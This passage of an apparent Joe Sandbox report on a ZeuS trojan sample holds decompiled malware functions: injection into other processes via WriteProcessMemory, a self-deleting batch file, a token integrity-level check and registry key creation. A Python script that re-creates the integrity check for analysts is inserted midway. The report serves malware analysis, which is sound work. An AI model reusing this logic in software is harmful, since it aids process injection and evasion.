											E004085E1(_t87, _t97);
											if(E00406C1B(0x20000, E0040CCDA, _t97) == 0) {
												E00408589(_t69, _t97);
											}
										}
										_t59 = WaitForMultipleObjects(_v184,  &_v156, 0, _t65);
										if(_t59 > 0) {
											continue;
										}
										goto L25;
									}
									_t72 = _v164;
									L20:
									_v168 = _t72;
									goto L23;
								}
								_t72 = _v156;
								goto L20;
							}
							goto L25;
						}
					}
					while(WaitForSingleObject( *0x423e74, 0x3e8) == 0x102) {
						_t87 = _v74;
						_t94 = E0040CC52( &_v156, _v74,  &_v164) & 0x0000ffff;
						if(_t94 == 0) {
							continue;
						}
						break;
					}
					if(_t94 == 0) {
						goto L26;
					}
					goto L7;
				}
				_t49 = 1;
				goto L27;
			}


APIs
    • Part of subcall function 0041C97E: CreateMutexW.KERNEL32(004239E8,00000000,?,?,?,?,?), ref: 0041C99F
  • WaitForSingleObject.KERNEL32(000003E8,?,?,743C152E,00000002), ref: 0040CE12
  • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF,?,?,743C152E), ref: 0040CEA3
  • accept.WS2_32(?,00000000,00000000), ref: 0040CF2F
  • WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 0040CF43
  • CloseHandle.KERNEL32(?), ref: 0040CF64
  • CloseHandle.KERNEL32(?), ref: 0040CF73
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Wait$CloseHandleMultipleObjects$CreateMutexObjectSingleaccept
  • String ID:
  • API String ID: 38240579-0
  • Opcode ID: 1590263d4af4385d947001dcb9c5136b30fd3c28dabf87e243ca0a068daf7e01
  • Instruction ID: 5bd0a52fe06a59c330cb6f030770cd991f1b5d25e7ae2fe88c26a7f81e190e28
  • Opcode Fuzzy Hash: 1590263d4af4385d947001dcb9c5136b30fd3c28dabf87e243ca0a068daf7e01
  • Instruction Fuzzy Hash: 4D516C71508201EBC720EB66DD84C6FB7E9EB85704F200A3EF595A31A0D734DD458B9A
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00404FF7() {
				char _v5;
				signed int _v12;
				signed int _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				long _v580;
				void* _v588;
				void* __esi;
				void* _t42;
				struct tagPROCESSENTRY32W* _t45;
				signed int _t47;
				void* _t48;
				long _t65;
				int _t71;
				void** _t72;
				void* _t73;

				_t71 = 0;
				_v5 = 0;
				_v16 = 0;
				_v12 = 0;
				while(1) {
					_t42 = CreateToolhelp32Snapshot(2, _t71);
					_v20 = _t42;
					_v24 = _t71;
					if(_t42 == 0xffffffff) {
						break;
					} else {
						_t45 =  &_v588;
						_v588 = 0x22c;
						Process32FirstW(_v20, _t45);
					}
					while(_t45 != 0) {
						_t65 = _v580;
						if(_t65 <= _t71 || _t65 ==  *0x423c20) {
							L20:
							_t45 = Process32NextW(_v20,  &_v588);
							continue;
						} else {
							_t47 = 0;
							if(_v12 <= _t71) {
								L8:
								_t48 = E0041C8D5(_t65, _t70, _t65);
								_v28 = _t48;
								if(_t48 != _t71) {
									_t73 = OpenProcess(0x400, _t71, _v580);
									if(_t73 != _t71) {
										_t72 = E004067FD(_t65, _t73,  &_v32);
										CloseHandle(_t73);
										if(_t72 != 0) {
											if(_v32 ==  *0x4239c0 && GetLengthSid( *_t72) ==  *0x4239b8 && E00405257( *((intOrPtr*)( *0x4239b4)),  *_t72, _t56) == 0 && E00405171(4 + _v12 * 4,  &_v16) != 0) {
												_t70 = _v12;
												_v12 = _v12 + 1;
												_v24 = _v24 + 1;
												 *((intOrPtr*)(_v16 + _v12 * 4)) = _v580;
												if(E00404F6E(_v16, _v580, _v28) != 0) {
													_v5 = 1;
												}
											}
											E004051E6(_t72);
										}
										_t71 = 0;
									}
									CloseHandle(_v28);
								}
								goto L20;
							} else {
								goto L6;
							}
							while(1) {
								L6:
								_t70 = _v16;
								if( *((intOrPtr*)(_v16 + _t47 * 4)) == _t65) {
									goto L20;
								}
								_t47 = _t47 + 1;
								if(_t47 < _v12) {
									continue;
								}
								goto L8;
							}
							goto L20;
						}
					}
					CloseHandle(_v20);
					if(_v24 != _t71) {
						continue;
					}
					break;
				}
				E004051E6(_v16);
				return _v5;
			}


APIs
  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00405018
  • Process32FirstW.KERNEL32(?,?), ref: 00405041
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,74B5F560,00000000), ref: 0040509C
  • CloseHandle.KERNEL32(00000000,00000000,?,?,74B5F560,00000000), ref: 004050B9
  • GetLengthSid.ADVAPI32(00000000,?,74B5F560,00000000), ref: 004050CC
  • CloseHandle.KERNEL32(?,?,74B5F560,00000000), ref: 00405139
  • Process32NextW.KERNEL32(?,0000022C), ref: 00405145
  • CloseHandle.KERNEL32(?,?,74B5F560,00000000), ref: 00405156
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CloseHandle$Process32$CreateFirstLengthNextOpenProcessSnapshotToolhelp32
  • String ID:
  • API String ID: 1981844004-0
  • Opcode ID: 8c86a0ef3a2a725d7cbd530d1159b5c2a6015a43fb53d3fbe74db6e218ecd4a2
  • Instruction ID: aada025cae0c4f7f853e621d05e2eb69bc6c9742fe0e4c4e8dd0ac449aefde2b
  • Opcode Fuzzy Hash: 8c86a0ef3a2a725d7cbd530d1159b5c2a6015a43fb53d3fbe74db6e218ecd4a2
  • Instruction Fuzzy Hash: 4E415C70D04519ABCF21EFA4DC84AAFBB76FF85304F1001AAE555B72A0D7395A81CF58
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0040E8D1(int __eax, long __ecx, void* __edx) {
				struct HWND__* _v8;
				signed short _v12;
				int _v16;
				long _v20;
				struct tagPOINT _v28;
				intOrPtr _t46;
				int _t50;
				signed int _t51;
				signed int _t52;
				signed int _t63;
				signed int _t64;
				signed int _t67;
				signed int _t69;
				signed int _t70;
				signed int _t71;
				int _t73;
				void* _t74;
				long _t78;
				void* _t79;
				void* _t80;
				intOrPtr _t81;

				_t80 = __edx;
				_t73 = __eax;
				_t78 = __ecx;
				WaitForSingleObject( *(__edx + 0x14), 0xffffffff);
				_t46 =  *((intOrPtr*)(_t80 + 0x10));
				_v8 =  *((intOrPtr*)(_t46 + 0x108));
				_v12 =  *(_t46 + 0x110) & 0x0000ffff;
				ReleaseMutex( *(_t80 + 0x14));
				_t50 = GetWindowRect(_v8,  &_v28);
				if(_t50 != 0) {
					if(_v12 != 2) {
						_t51 = _v12 & 0x0000ffff;
						__eflags = _t51 - 0xd;
						if(__eflags > 0) {
							_t52 = _t51 - 0xe;
							__eflags = _t52;
							if(_t52 == 0) {
								_v20 = _t78;
								goto L22;
							} else {
								_t63 = _t52 - 1;
								__eflags = _t63;
								if(_t63 == 0) {
									_v16 = _t73;
								} else {
									_t64 = _t63 - 1;
									__eflags = _t64;
									if(_t64 == 0) {
										_v16 = _t73;
										goto L19;
									} else {
										__eflags = _t64 == 1;
										if(_t64 == 1) {
											goto L16;
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								L11:
								_v28.x = _t78;
								goto L22;
							} else {
								_t67 = _t51;
								__eflags = _t67;
								if(_t67 == 0) {
									goto L11;
								} else {
									_t69 = _t67;
									__eflags = _t69;
									if(_t69 == 0) {
										L16:
										_v16 = _t73;
										goto L17;
									} else {
										_t70 = _t69 - 6;
										__eflags = _t70;
										if(_t70 == 0) {
											L19:
											_v28.x = _t78;
										} else {
											_t71 = _t70 - 1;
											__eflags = _t71;
											if(_t71 == 0) {
												L17:
												_v20 = _t78;
											} else {
												__eflags = _t71 == 1;
												if(_t71 == 1) {
													L22:
													_v28.y = _t73;
												}
											}
										}
									}
								}
							}
						}
					} else {
						_t81 =  *((intOrPtr*)(_t80 + 0x10));
						_t79 = _t78 -  *((intOrPtr*)(_t81 + 0x100));
						_t74 = _t73 -  *((intOrPtr*)(_t81 + 0x104));
						_v28.x = _v28.x + _t79;
						_v28.y = _v28.y + _t74;
						_v20 = _v20 + _t79;
						_v16 = _v16 + _t74;
					}
					_t50 = IsRectEmpty( &_v28);
					if(_t50 == 0) {
						if((GetWindowLongW(_v8, 0xfffffff0) & 0x40000000) != 0) {
							MapWindowPoints(0, GetParent(_v8),  &_v28, 2);
						}
						return SetWindowPos(_v8, 0, _v28.x, _v28.y, _v20 - _v28, _v16 - _v28.y, 0x630c);
					}
				}
				return _t50;
			}


APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040E8E5
  • ReleaseMutex.KERNEL32(?), ref: 0040E904
  • GetWindowRect.USER32 ref: 0040E911
  • IsRectEmpty.USER32(?), ref: 0040E995
  • GetWindowLongW.USER32(?,000000F0), ref: 0040E9A4
  • GetParent.USER32(?), ref: 0040E9BA
  • MapWindowPoints.USER32 ref: 0040E9C3
  • SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 0040E9E7
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Window$Rect$EmptyLongMutexObjectParentPointsReleaseSingleWait
  • String ID:
  • API String ID: 2634726239-0
  • Opcode ID: 6b6c43b12c0a30725b78ee35ff5d57d0414fc516184589c1d19d85446a3141f4
  • Instruction ID: 93cd0cad5809ab13b5db98570f55185eb26e9717d0758e792d8c0aae3b8d2bb7
  • Opcode Fuzzy Hash: 6b6c43b12c0a30725b78ee35ff5d57d0414fc516184589c1d19d85446a3141f4
  • Instruction Fuzzy Hash: CB415EB1C0420ADFDB508FAAC949ABFBBB4FB04350F10097AEA51B22A0C7749951DB54
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 85%
			E0040B790(void* __ecx, signed int __edx, void* __eflags, struct HDC__* _a4, BITMAPINFO** _a8, char _a12, void* _a16, long _a20, void* _a24) {
				int _v8;
				void* _t37;
				long _t38;
				struct HBITMAP__* _t46;
				void* _t47;
				signed int _t56;
				signed int _t57;
				BITMAPINFO** _t62;
				BITMAPINFO* _t64;

				_t57 = __edx;
				_v8 = 0;
				_t64 = E004051B6(0x428);
				if(_t64 == 0) {
					L14:
					if(_a24 != 0) {
						DeleteObject(_a24);
					}
					L16:
					return _v8;
				}
				_t64->bmiHeader = 0x28;
				if(GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0 || GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0) {
					L13:
					E004051E6(_t64);
					goto L14;
				} else {
					DeleteObject(_a24);
					asm("cdq");
					_t56 =  ~((_t64->bmiHeader.biHeight ^ __edx) - __edx);
					_t37 = (_t64->bmiHeader.biBitCount & 0x0000ffff) - 1;
					_a24 = 0;
					_t64->bmiHeader.biHeight = _t56;
					if(_t37 == 0) {
						L7:
						_t64->bmiHeader.biClrUsed = 0;
						_push(8);
						_t64->bmiHeader.biClrImportant = 0;
						L8:
						_pop(_t38);
						_t64->bmiHeader.biBitCount = _t38;
						L9:
						_t62 = _a8;
						asm("cdq");
						_t58 = _t57 & 0x00000007;
						asm("cdq");
						_t64->bmiHeader.biSizeImage = ((_t64->bmiHeader.biBitCount & 0x0000ffff) * _t64->bmiHeader.biWidth * _t56 + (_t57 & 0x00000007) >> 0x00000003 ^ _t58) - _t58;
						_t64->bmiHeader.biCompression = 0;
						if(_t62 != 0) {
							 *_t62 = _t64;
						}
						_t21 =  &_a12; // 0x423258
						_t46 = CreateDIBSection(_a4, _t64, 0,  *_t21, _a16, _a20);
						_v8 = _t46;
						if(_t46 == 0 || _t62 == 0) {
							goto L13;
						} else {
							goto L16;
						}
					}
					_t47 = _t37 - 3;
					if(_t47 == 0) {
						goto L7;
					}
					if(_t47 != 0x14) {
						goto L9;
					}
					_push(0x20);
					goto L8;
				}
			}


APIs
  • GetDIBits.GDI32(00000000,0040D49C,00000000,00000001,00000000,00000000,00000000), ref: 0040B7C8
  • GetDIBits.GDI32(00000000,0040D49C,00000000,00000001,00000000,00000000,00000000), ref: 0040B7DE
  • DeleteObject.GDI32(0040D49C), ref: 0040B7EB
  • CreateDIBSection.GDI32(?,00000000,00000000,X2B,2937498D,?), ref: 0040B85B
  • DeleteObject.GDI32(0040D49C), ref: 0040B87A
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: BitsDeleteObject$CreateSection
  • String ID: X2B
  • API String ID: 1423349713-3897348823
  • Opcode ID: 6935475bb1cac5ea8b57b740d3f029f22b651f57ede845240fdef125084c84d5
  • Instruction ID: 152b8cf27009f976b5e8f6f7612a74027960e92f6422b972dc82a4fd5e2095f5
  • Opcode Fuzzy Hash: 6935475bb1cac5ea8b57b740d3f029f22b651f57ede845240fdef125084c84d5
  • Instruction Fuzzy Hash: 2231B37250120AAFDB20AF65CD8496B7EE9EF44344B04C43EF985A62B0C735DD50CBA8
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 95%
			E0041C9B9(void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a4, void _a8) {
				char _v5;
				void _v12;
				void _t26;
				void _t43;
				void* _t51;
				void* _t52;

				_t52 = __esi;
				_t51 = __edi;
				_t26 = E00409B46( *0x4239c4, __edi);
				_v12 = _t26;
				if(_t26 != 0) {
					_v5 = 0;
					if(DuplicateHandle(0xffffffff, _a4, __edi,  &_a4, 0, 0, 2) == 0) {
						_v5 = 1;
					}
					_a8 = _a8 |  *0x4239b0 & 0x00000014;
					_push(_t52);
					if(WriteProcessMemory(_t51, 0x4239b0 -  *0x4239c4 + _v12,  &_a8, 4, 0) == 0) {
						_v5 = _v5 + 1;
					}
					if(WriteProcessMemory(_t51, 0x4239c4 -  *0x4239c4 + _v12,  &_v12, 4, 0) == 0) {
						_v5 = _v5 + 1;
					}
					if(E0041C197(0x423e74, _t51, _v12,  *0x423e74) == 0) {
						_v5 = _v5 + 1;
					}
					if(E0041C197(0x423e78, _t51, _v12,  *0x423e78) == 0) {
						_v5 = _v5 + 1;
					}
					if(_v5 == 0) {
						_t43 = _v12;
					} else {
						VirtualFreeEx(_t51, _v12, 0, 0x8000);
						goto L1;
					}
				} else {
					L1:
					_t43 = 0;
				}
				return _t43;
			}


APIs
    • Part of subcall function 00409B46: IsBadReadPtr.KERNEL32(?,?,00000000,?,00000000,?,00000000,?,74B5F560,00000000), ref: 00409B62
  • DuplicateHandle.KERNEL32(000000FF,74B5F560,00000000,74B5F560,00000000,00000000,00000002,00000000,00000000,?,?,?,00404F98,?,00000000,?), ref: 0041C9EB
  • WriteProcessMemory.KERNEL32(00000000,74B5F560,?,00000004,00000000,?,?,?,?,00404F98,?,00000000,?,?,00405126,?), ref: 0041CA22
  • WriteProcessMemory.KERNEL32(00000000,74B5F560,74B5F560,00000004,00000000,?,?,?,00404F98,?,00000000,?,?,00405126,?,?), ref: 0041CA42
  • VirtualFreeEx.KERNEL32(00000000,74B5F560,00000000,00008000,00000000,74B5F560,00000000,74B5F560,?,?,00404F98,?,00000000,?,?,00405126), ref: 0041CA91
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: MemoryProcessWrite$DuplicateFreeHandleReadVirtual
  • String ID: t>B$x>B
  • API String ID: 2215616122-900562162
  • Opcode ID: 6152c06072b29db1ae21e06b12bd58e4d6426c39aeb0732ba8daf5bcf876980a
  • Instruction ID: 566495e6fded9885ec3e17b151fc3ed65e893a863b42b24250469881bea39cea
  • Opcode Fuzzy Hash: 6152c06072b29db1ae21e06b12bd58e4d6426c39aeb0732ba8daf5bcf876980a
  • Instruction Fuzzy Hash: 0C21E6B2A44148BADB02CFA4DC81FFFBF78EF1A745F004096F600A2151D3795A868B28
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 83%
			E00406CA6(void* __ebx, void* __edi, char _a4) {
				short _v24;
				intOrPtr _v28;
				char _v72;
				short _v592;
				char _v852;
				char _v1392;
				void* _t35;
				char _t56;

				if(E0040A569(L"bat",  &_v592) == 0) {
					L7:
					return 0;
				}
				CharToOemW( &_v592,  &_v852);
				_push( &_v852);
				if(E00405FAA( &_a4, "@echo off\r\n%s\r\ndel /F \"%s\"\r\n", _a4) == 0xffffffff) {
					L6:
					E0040A548( &_v592);
					goto L7;
				}
				_t35 = E0040A39D( &_v592, _a4, _t31);
				E004051E6(_a4);
				if(_t35 == 0) {
					goto L6;
				}
				_push(__edi);
				_push( &_v592);
				if(E00405ED9( &_v592, 0x10e,  &_v1392, L"/c \"%s\"") <= 0xffffffff || GetEnvironmentVariableW(L"ComSpec",  &_v592, 0x104) - 1 > 0x102) {
					goto L6;
				} else {
					_t56 = 0x44;
					E00405299( &_v72,  &_v72, 0, _t56);
					_v24 = 0;
					_v72 = _t56;
					_v28 = 1;
					return E00406AAD( &_v592,  &_v1392, 0,  &_v72, 0) & 0xffffff00 | _t48 != 0x00000000;
				}
			}


APIs
    • Part of subcall function 0040A569: GetTempPathW.KERNEL32(000000F6,?), ref: 0040A580
  • CharToOemW.USER32 ref: 00406CD6
    • Part of subcall function 0040A39D: CreateFileW.KERNEL32(00406CC0,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,0040A5DC,00406CC0,00000000,00000000,00406CC0,?), ref: 0040A3B7
    • Part of subcall function 0040A39D: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A5DC,00406CC0,00000000,00000000,00406CC0,?), ref: 0040A3DA
    • Part of subcall function 0040A39D: CloseHandle.KERNEL32(00000000,?,0040A5DC,00406CC0,00000000,00000000,00406CC0,?), ref: 0040A3E7
    • Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9
  • GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00406D5A
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: File$CharCloseCreateEnvironmentFreeHandleHeapPathTempVariableWrite
  • String ID: /c "%s"$@echo off%sdel /F "%s"$ComSpec$bat
  • API String ID: 1639923935-3344086482
  • Opcode ID: e1d9e0a093d60fa402946580ae0dbf5b80ad392d376683bab301abdd757d4350
  • Instruction ID: 8ecae1cbe105802aa65f514ed3cbe2352667d5b1e7ac0b7862ad85de1975928b
  • Opcode Fuzzy Hash: e1d9e0a093d60fa402946580ae0dbf5b80ad392d376683bab301abdd757d4350
  • Instruction Fuzzy Hash: 752181B19012186EDF10EAA4CC46EEF77ACEF04315F2041B7B509F20D0D6389B558B64
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 95%
			E0040693A(void* __ecx) {
				long _v8;
				void* _v12;
				char* _t21;
				signed char _t22;
				DWORD* _t25;
				void* _t32;

				_t28 = 0;
				if(OpenProcessToken(0xffffffff, 8,  &_v12) == 0) {
					L14:
					return _t28;
				}
				if(GetTokenInformation(_v12, 0x19, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L13:
					CloseHandle(_v12);
					goto L14;
				} else {
					_t32 = E004051B6(_v8);
					if(_t32 == 0) {
						L12:
						goto L13;
					}
					if(GetTokenInformation(_v12, 0x19, _t32, _v8,  &_v8) != 0) {
						_t21 = GetSidSubAuthorityCount( *_t32);
						if(_t21 != 0) {
							_t22 =  *_t21;
							if(_t22 > 0) {
								_t25 = GetSidSubAuthority( *_t32, (_t22 & 0x000000ff) - 1);
								if(_t25 != 0) {
									if( *_t25 >= 0x2000) {
										asm("sbb bl, bl");
										_t28 = 3;
									} else {
										_t28 = 1;
									}
								}
							}
						}
					}
					E004051E6(_t32);
					goto L12;
				}
			}

APIs
  • OpenProcessToken.ADVAPI32(000000FF,00000008,00000001,?,?,?,?,0041C28A,00000000,0041C766), ref: 0040694A
  • GetTokenInformation.ADVAPI32(00000001,00000019(TokenIntegrityLevel),00000000,00000000,00000000,74B04EE0,?,?,?,0041C28A,00000000,0041C766), ref: 0040696A
  • GetLastError.KERNEL32(?,?,?,0041C28A,00000000,0041C766), ref: 00406970
  • GetTokenInformation.ADVAPI32(00000001,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 00406997
  • GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,0041C28A,00000000,0041C766), ref: 0040699F
  • GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,0041C28A,00000000,0041C766), ref: 004069B6
  • CloseHandle.KERNEL32(00000001,?,?,?,0041C28A,00000000,0041C766), ref: 004069E1
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: Token$AuthorityInformation$CloseCountErrorHandleLastOpenProcess
  • String ID:
  • API String ID: 3714493844-0
  • Opcode ID: b2ef6e4b1d648e4f3cfc1034f6bf8560e4fc26bb4c172c2735d596bc5b81f5cf
  • Instruction ID: 904c498ea62c2aa3affa1e21d4df142b50673bf27f3c92195cbe654f364c19c3
  • Opcode Fuzzy Hash: b2ef6e4b1d648e4f3cfc1034f6bf8560e4fc26bb4c172c2735d596bc5b81f5cf
  • Instruction Fuzzy Hash: B511BEB1500058BFEB115BA0CD84EBE3B6DEB01304F100073F542FA5A0D7398E95EB28
Uniqueness

Uniqueness Score: -1.00%
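Added example, not code from the report or from the sample: E0040693A opens its own token (handle -1, TOKEN_QUERY = 8), queries TokenIntegrityLevel (class 0x19) once with a NULL buffer to learn the size (that call has to fail with ERROR_INSUFFICIENT_BUFFER, 0x7a), then reads the last sub-authority of the mandatory-label SID with GetSidSubAuthorityCount / GetSidSubAuthority(sid, count - 1) and returns 3 when it is at or above SECURITY_MANDATORY_MEDIUM_RID (0x2000), 1 when it is lower, and 0 when any step failed. The Python below reproduces that classification on raw SID bytes so the decision can be checked offline without a Windows token; build_sid, parse_sid, classify_like_sample and the other names are this example's own, and the SID blobs it feeds in are constructed.

```python
import struct

# RIDs of the mandatory-label SIDs (S-1-16-<rid>), values from winnt.h.
SECURITY_MANDATORY_LABEL_AUTHORITY = 16
SECURITY_MANDATORY_UNTRUSTED_RID = 0x0000
SECURITY_MANDATORY_LOW_RID = 0x1000
SECURITY_MANDATORY_MEDIUM_RID = 0x2000
SECURITY_MANDATORY_HIGH_RID = 0x3000
SECURITY_MANDATORY_SYSTEM_RID = 0x4000

LABEL_NAMES = {
    SECURITY_MANDATORY_UNTRUSTED_RID: "Untrusted",
    SECURITY_MANDATORY_LOW_RID: "Low",
    SECURITY_MANDATORY_MEDIUM_RID: "Medium",
    SECURITY_MANDATORY_HIGH_RID: "High",
    SECURITY_MANDATORY_SYSTEM_RID: "System",
}


def build_sid(authority, *sub_authorities):
    """Serialize a SID in the binary layout GetTokenInformation hands back:
    Revision (1 byte) | SubAuthorityCount (1) | IdentifierAuthority (6, big-endian)
    | SubAuthority[count] (4 bytes each, little-endian)."""
    if not 0 <= len(sub_authorities) <= 15:
        raise ValueError("a SID carries at most 15 sub-authorities")
    header = struct.pack("<BB", 1, len(sub_authorities)) + authority.to_bytes(6, "big")
    return header + b"".join(struct.pack("<I", s) for s in sub_authorities)


def parse_sid(blob):
    """Inverse of build_sid; returns (identifier_authority, [sub_authorities])."""
    if len(blob) < 8 or blob[0] != 1:
        raise ValueError("malformed SID: bad length or revision")
    count = blob[1]
    if len(blob) < 8 + 4 * count:
        raise ValueError("malformed SID: truncated sub-authority array")
    authority = int.from_bytes(blob[2:8], "big")
    subs = [struct.unpack_from("<I", blob, 8 + 4 * i)[0] for i in range(count)]
    return authority, subs


def sid_to_string(blob):
    authority, subs = parse_sid(blob)
    return "S-1-" + "-".join(str(x) for x in (authority, *subs))


def integrity_rid(label_sid):
    """What the sample does with the TOKEN_MANDATORY_LABEL SID:
    GetSidSubAuthorityCount, then GetSidSubAuthority(sid, count - 1)."""
    _, subs = parse_sid(label_sid)
    if not subs:
        raise ValueError("label SID has no sub-authorities")
    return subs[-1]


def classify_like_sample(label_sid):
    """Mirror E0040693A's return value: 0 on failure, 1 below Medium,
    3 at or above Medium (the 0x2000 comparison in the listing)."""
    try:
        rid = integrity_rid(label_sid)
    except ValueError:
        return 0
    return 3 if rid >= SECURITY_MANDATORY_MEDIUM_RID else 1


def label_name(label_sid):
    """Human-readable level for analysts; a RID between the defined steps
    (e.g. Medium Plus, 0x2100) is reported relative to the step below it."""
    authority, _ = parse_sid(label_sid)
    if authority != SECURITY_MANDATORY_LABEL_AUTHORITY:
        raise ValueError("not a mandatory-label SID")
    rid = integrity_rid(label_sid)
    base = max(r for r in LABEL_NAMES if r <= rid)
    return LABEL_NAMES[base] if base == rid else f"{LABEL_NAMES[base]}+{rid - base:#x}"


if __name__ == "__main__":
    # Constructed input: the label of a protected-mode (Low integrity) browser tab.
    low_tab = build_sid(SECURITY_MANDATORY_LABEL_AUTHORITY, SECURITY_MANDATORY_LOW_RID)
    print(sid_to_string(low_tab), label_name(low_tab), classify_like_sample(low_tab))
```

Medium, High and System all map to 3, so the check only separates a low-integrity context (a protected-mode browser process, for instance) from everything else; it says nothing about elevation.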

C-Code - Quality: 100%
			E00409700(short* _a4) {
				char _v5;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				long _t18;

				_v5 = 0;
				_t18 = RegCreateKeyExW(0x80000001, L"SOFTWARE\\Microsoft", 0, 0, 0, 4, 0,  &_v16, 0);
				_t33 = _t18;
				if(_t18 == 0) {
					_v12 = 0;
					do {
						E00409565(6, 4, _t33, 2, _a4);
						if(RegCreateKeyExW(_v16, _a4, 0, 0, 0, 3, 0,  &_v20,  &_v24) != 0) {
							goto L4;
						} else {
							RegCloseKey(_v20);
							if(_v24 == 1) {
								_v5 = 1;
							} else {
								goto L4;
							}
						}
						L7:
						RegCloseKey(_v16);
						goto L8;
						L4:
						_v12 = _v12 + 1;
					} while (_v12 < 0x64);
					goto L7;
				}
				L8:
				return _v5;
			}

APIs
  • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00409728
    • Part of subcall function 00409565: CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 00409686
  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 0040975A
  • RegCloseKey.ADVAPI32(?), ref: 00409763
  • RegCloseKey.ADVAPI32(?), ref: 0040977D
Strings
Memory Dump Source
  • Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp
  • Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp
  • Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd
Similarity
  • API ID: CloseCreate$CharUpper
  • String ID: SOFTWARE\Microsoft$d
  • API String ID: 1794619670-1227932965
  • Opcode ID: 2b9c93a098483c532e3eb310db293f4abdf10b192bc54bd7db778e8cb5f2484a
